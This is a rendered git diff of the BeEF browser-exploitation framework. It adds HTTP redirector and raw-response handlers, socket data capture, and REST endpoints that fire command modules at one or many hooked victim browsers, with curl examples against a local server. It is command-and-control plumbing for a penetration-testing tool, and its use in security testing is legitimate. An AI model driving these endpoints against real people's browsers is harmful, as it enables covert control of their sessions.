# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core

16
core/main/models/optioncache.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core

16
core/main/models/result.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core

16
core/main/models/user.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core

16
core/main/network_stack/api.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core

85
core/main/network_stack/assethandler.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
@@ -34,6 +24,38 @@ module Handlers
@root_dir = File.expand_path('../../../../', __FILE__)
end
# Binds a redirector to a mount point
# @param [String] target The target for the redirector
# @param [String] path An optional URL path to mount the redirector to (can be nil for a random path)
# @return [String] URL Path of the redirector
# @todo This function, similar to bind(), should accept a hooked browser session to limit the mounted file to a certain session etc.
def bind_redirect(target, path=nil)
url = build_url(path,nil)
@allocations[url] = {'target' => target}
@http_server.mount(url,BeEF::Core::NetworkStack::Handlers::Redirector.new(target))
@http_server.remap
print_info "Redirector to [" + target + "] bound to url [" + url + "]"
url
end
# Binds raw HTTP to a mount point
# @param [Integer] status HTTP status code to return
# @param [String] headers HTTP headers as a JSON string to return
# @param [String] body HTTP body to return
# @param [String] path URL path to mount the asset to TODO (can be nil for random path)
# @todo @param [Integer] count The amount of times the asset can be accessed before being automatically unbinded (-1 = unlimited)
def bind_raw(status, header, body, path=nil, count=-1)
url = build_url(path,nil)
@allocations[url] = {}
@http_server.mount(
url,
BeEF::Core::NetworkStack::Handlers::Raw.new(status, header, body)
)
@http_server.remap
print_info "Raw HTTP bound to url [" + url + "]"
url
end
# Binds a file to a mount point
# @param [String] file File path to asset
# @param [String] path URL path to mount the asset to (can be nil for random path)
@@ -63,7 +85,7 @@ module Handlers
# use it like: bind_socket("irc","0.0.0.0",6667)
def bind_socket(name, host, port)
if @sockets[name] != nil
print_error "Thread [#{name}] is already listening on [#{host}:#{port}]."
print_error "Bind Socket [#{name}] is already listening on [#{host}:#{port}]."
else
t = Thread.new {
server = TCPServer.new(host,port)
@@ -71,24 +93,47 @@ module Handlers
Thread.start(server.accept) do |client|
data = ""
recv_length = 1024
threshold = 1024 * 512
while (tmp = client.recv(recv_length))
data += tmp
break if tmp.length < recv_length || tmp.length == recv_length
# 512 KB max of incoming data
break if data > threshold
end
if data.size > threshold
print_error "More than 512 KB of data incoming for Bind Socket [#{name}]. For security purposes client connection is closed, and data not saved."
else
@sockets[name] = {'thread' => t, 'data' => data}
print_info "Bind Socket [#{name}] received [#{data.size}] bytes of data."
print_debug "Bind Socket [#{name}] received:\n#{data}"
end
client.close
print_debug "Bind Socket on Thread [#{name}] received:\n#{data}"
end
end
}
@sockets[name] = t
print_info "Thread [#{name}] listening on [#{host}:#{port}]."
print_info "Bind socket [#{name}] listening on [#{host}:#{port}]."
end
end
def get_socket_data(name)
data = nil
if @sockets[name] != nil
data = @sockets[name]['data']
else
print_error "Bind Socket [#{name}] does not exists."
end
data
end
def unbind_socket(name)
t = @sockets[name]
Thread.kill(t)
print_info "Thread [#{name}] killed."
t = @sockets[name]['thread']
if t.alive?
print_debug "Thread to be killed: #{t}"
Thread.kill(t)
print_info "Bind Socket [#{name}] killed."
else
print_info "Bind Socket [#{name}] ALREADY killed."
end
end
# Builds a URL based on the path and extension, if neither are passed a random URL will be generated

16
core/main/network_stack/handlers/dynamicreconstruction.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core

33
core/main/network_stack/handlers/raw.rb Normal file
View File

@@ -0,0 +1,33 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
module NetworkStack
module Handlers
class Raw
def initialize(status, header={}, body)
@status = status
@header = header
@body = body
end
def call(env)
[@status, @header, @body]
end
private
@request
@response
end
end
end
end
end

42
core/main/network_stack/handlers/redirector.rb Normal file
View File

@@ -0,0 +1,42 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
module NetworkStack
module Handlers
# @note Redirector is used as a Rack app for mounting HTTP redirectors, instead of content
# @todo Add new options to specify what kind of redirect you want to achieve
class Redirector
@target = ""
def initialize(target)
@target = target
end
def call(env)
@response = Rack::Response.new(
body = ['302 found'],
status = 302,
header = {
'Content-Type' => 'text',
'Location' => @target
}
)
end
private
@request
@response
end
end
end
end
end

16
core/main/network_stack/websocket/websocket.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core

31
core/main/rest/api.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
@@ -29,6 +19,12 @@ module BeEF
end
end
module RegisterCategoriesHandler
def self.mount_handler(server)
server.mount('/api/categories', BeEF::Core::Rest::Categories.new)
end
end
module RegisterLogsHandler
def self.mount_handler(server)
server.mount('/api/logs', BeEF::Core::Rest::Logs.new)
@@ -41,10 +37,19 @@ module BeEF
end
end
module RegisterServerHandler
def self.mount_handler(server)
server.mount('/api/server', BeEF::Core::Rest::Server.new)
end
end
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterHooksHandler, BeEF::API::Server, 'mount_handler')
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterModulesHandler, BeEF::API::Server, 'mount_handler')
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterCategoriesHandler, BeEF::API::Server, 'mount_handler')
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterLogsHandler, BeEF::API::Server, 'mount_handler')
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterAdminHandler, BeEF::API::Server, 'mount_handler')
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterServerHandler, BeEF::API::Server, 'mount_handler')
#
# Check the source IP is within the permitted subnet

16
core/main/rest/handlers/admin.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF

39
core/main/rest/handlers/categories.rb Normal file
View File

@@ -0,0 +1,39 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
module Rest
class Categories < BeEF::Core::Router::Router
config = BeEF::Core::Configuration.instance
before do
error 401 unless params[:token] == config.get('beef.api_token')
halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip)
headers 'Content-Type' => 'application/json; charset=UTF-8',
'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0'
end
get '/' do
categories = BeEF::Modules::get_categories
cats = Array.new
i = 0
# todo add sub-categories support!
categories.each do |category|
cat = {"id" => i, "name" => category}
cats << cat
i += 1
end
cats.to_json
end
end
end
end
end

42
core/main/rest/handlers/hookedbrowsers.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
@@ -30,12 +20,16 @@ module BeEF
'Expires' => '0'
end
#
# @note Return a can of Leffe to the thirsty Bovine Security Team member. AthCon2012 joke /antisnatchor/
#
#get "/to/a/pub"
# "BeER please"
#end
#
# @note Get online and offline hooked browsers details (like name, version, os, ip, port, ...)
#
get '/' do
online_hooks = hb_to_json(BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 15)))
offline_hooks = hb_to_json(BeEF::Core::Models::HookedBrowser.all(:lastseen.lt => (Time.new.to_i - 15)))
@@ -49,7 +43,9 @@ module BeEF
output.to_json
end
#
# @note Get all the hooked browser details (plugins enabled, technologies enabled, cookies)
#
get '/:session' do
hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session])
error 401 unless hb != nil
@@ -76,15 +72,15 @@ module BeEF
details = BeEF::Core::Models::BrowserDetails
{
'id' => hb.id,
'session' => hb.session,
'name' => details.get(hb.session, 'BrowserName'),
'version' => details.get(hb.session, 'BrowserVersion'),
'os' => details.get(hb.session, 'OsName'),
'platform' => details.get(hb.session, 'SystemPlatform'),
'ip' => hb.ip,
'domain' => details.get(hb.session, 'HostName'),
'port' => hb.port.to_s,
'id' => hb.id,
'session' => hb.session,
'name' => details.get(hb.session, 'BrowserName'),
'version' => details.get(hb.session, 'BrowserVersion'),
'os' => details.get(hb.session, 'OsName'),
'platform' => details.get(hb.session, 'BrowserPlatform'),
'ip' => hb.ip,
'domain' => details.get(hb.session, 'HostName'),
'port' => hb.port.to_s,
'page_uri' => details.get(hb.session, 'PageURI')
}
end
@@ -92,4 +88,4 @@ module BeEF
end
end
end
end
end

20
core/main/rest/handlers/logs.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
@@ -30,13 +20,17 @@ module BeEF
'Expires' => '0'
end
#
# @note Get all global logs
#
get '/' do
logs = BeEF::Core::Models::Log.all()
logs_to_json(logs)
end
#
# @note Get hooked browser logs
#
get '/:session' do
hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session])
error 401 unless hb != nil

123
core/main/rest/handlers/modules.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
@@ -30,7 +20,9 @@ module BeEF
'Expires' => '0'
end
#
# @note Get all available and enabled modules (id, name, category)
#
get '/' do
mods = BeEF::Core::Models::CommandModule.all
@@ -50,7 +42,18 @@ module BeEF
mods_hash.to_json
end
get '/search/:mod_name' do
mod = BeEF::Core::Models::CommandModule.first(:name => params[:mod_name])
result = {}
if mod != nil
result = {'id' => mod.id}
end
result.to_json
end
#
# @note Get the module definition (info, options)
#
get '/:mod_id' do
cmd = BeEF::Core::Models::CommandModule.get(params[:mod_id])
error 404 unless cmd != nil
@@ -76,20 +79,29 @@ module BeEF
#Content-Type: application/json; charset=UTF-8
#
#{"date":"1331637093","data":"{\"data\":\"text=michele\"}"}
#
get '/:session/:mod_id/:cmd_id' do
hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session])
error 401 unless hb != nil
cmd = BeEF::Core::Models::Command.first(:hooked_browser_id => hb.id,
:command_module_id => params[:mod_id], :id => params[:cmd_id])
error 404 unless cmd != nil
result = BeEF::Core::Models::Result.first(:hooked_browser_id => hb.id, :command_id => cmd.id)
error 404 unless result != nil
{
'date' => result.date,
'data' => result.data
}.to_json
results = BeEF::Core::Models::Result.all(:hooked_browser_id => hb.id, :command_id => cmd.id)
error 404 unless results != nil
results_hash = {}
i = 0
results.each do |result|
results_hash[i] = {
'date' => result.date,
'data' => result.data
}
i+=1
end
results_hash.to_json
end
#
# @note Fire a new command module to the specified hooked browser.
# Return the command_id of the executed module if it has been fired correctly.
# Input must be specified in JSON format
@@ -123,6 +135,7 @@ module BeEF
#Content-Length: 35
#
#{"success":"true","command_id":"not_available"}
#
post '/:session/:mod_id' do
hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session])
error 401 unless hb != nil
@@ -142,8 +155,10 @@ module BeEF
end
end
#
#@note Fire a new command module to multiple hooked browsers.
# Returns the command IDs of the launched modules, or 0 if firing got issues.
# Returns the command IDs of the launched module, or 0 if firing got issues.
#
# POST request body example (for modules that don't need parameters, just remove "mod_params")
# {
# "mod_id":1,
@@ -152,11 +167,15 @@ module BeEF
# },
# "hb_ids":[1,2]
# }
#
# response example: {"1":16,"2":17}
#
# curl example (alert module with custom text, 2 hooked browsers)):
#
#curl -H "Content-Type: application/json; charset=UTF-8" -d '{"mod_id":110,"mod_params":{"text":"mucci?"},"hb_ids":[1,2]}'
#-X POST http://127.0.0.1:3000/api/modules/multi?token=2316d82702b83a293e2d46a0886a003a6be0a633
post '/multi' do
#
post '/multi_browser' do
request.body.rewind
begin
body = JSON.parse request.body.read
@@ -189,6 +208,68 @@ module BeEF
error 400 # Bad Request
end
end
# @note Fire multiple command modules to a single hooked browser.
# Returns the command IDs of the launched modules, or 0 if firing got issues.
#
# POST request body example (for modules that don't need parameters, just pass an empty JSON object like {} )
#{ "hb":"vkIwVV3ok5i5vH2f8sxlkoaKqAGKCbZXdWqE9vkHNFBhI8aBBHvtZAGRO2XqFZXxThBlmKlRiVwPeAzj",
# "modules": [
# { # test_return_long_string module with custom input
# "mod_id":99,
# "mod_input":[{"repeat":"10"},{"repeat_string":"ABCDE"}]
# },
# { # prompt_dialog module with custom input
# "mod_id":116,
# "mod_input":[{"question":"hooked?"}]
# },
# { # alert_dialog module without input (using default input, if any)
# "mod_id":128,
# "mod_input":[]
# }
# ]
# }
# response example: {"99":7,"116":8,"128":0} # <- This means the alert_dialog had issues (see return value 0)
#
# curl example (test_return_long_string and prompt_dialog module with custom inputs)):
#
#curl -H "Content-Type: application/json; charset=UTF-8" -d '{"hb":"vkIwVV3ok5i5vH2f8sxlkoaKqAGKCbZXdWqE9vkHNFBhI8aBBHvtZAGRO2XqFZXxThBlmKlRiVwPeAzj",
# "modules":[{"mod_id":99,"mod_input":[{"repeat":"10"},{"repeat_string":"ABCDE"}]},{"mod_id":116,"mod_input":[{"question":"hooked?"}]},{"mod_id":128,"mod_input":[]}]}'
# -X POST http://127.0.0.1:3000/api/modules/multi_module?token=e640483ae9bca2eb904f003f27dd4bc83936eb92
#
post '/multi_module' do
request.body.rewind
begin
body = JSON.parse request.body.read
hb = BeEF::Core::Models::HookedBrowser.first(:session => body["hb"])
error 401 unless hb != nil
results = Hash.new
if body["modules"] != nil
body["modules"].each{|mod|
mod_id = mod["mod_id"]
mod_k = BeEF::Module.get_key_by_database_id mod["mod_id"]
if mod_k == nil
results[mod_id] = 0
next
else
mod_params = []
mod["mod_input"].each{|input|
input.each{|k,v|
mod_params.push({'name' => k, 'value' => v})
}
}
cmd_id = BeEF::Module.execute(mod_k, hb.session, mod_params)
results[mod_id] = cmd_id
end
}
end
results.to_json
rescue Exception => e
print_error "Invalid JSON input passed to endpoint /api/modules/multi"
error 400 # Bad Request
end
end
end
end
end

41
core/main/rest/handlers/server.rb Normal file
View File

@@ -0,0 +1,41 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
module Rest
class Server < BeEF::Core::Router::Router
config = BeEF::Core::Configuration.instance
http_server = BeEF::Core::Server.instance
before do
error 401 unless params[:token] == config.get('beef.api_token')
halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip)
headers 'Content-Type' => 'application/json; charset=UTF-8',
'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0'
end
# @note Binds a local file to a specified path in BeEF's web server
post '/bind' do
request.body.rewind
begin
data = JSON.parse request.body.read
mount = data['mount']
local_file = data['local_file']
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind(local_file, mount)
status 200
rescue Exception => e
error 400
end
end
end
end
end
end

16
core/main/router/api.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core

Some files were not shown because too many files have changed in this diff Show More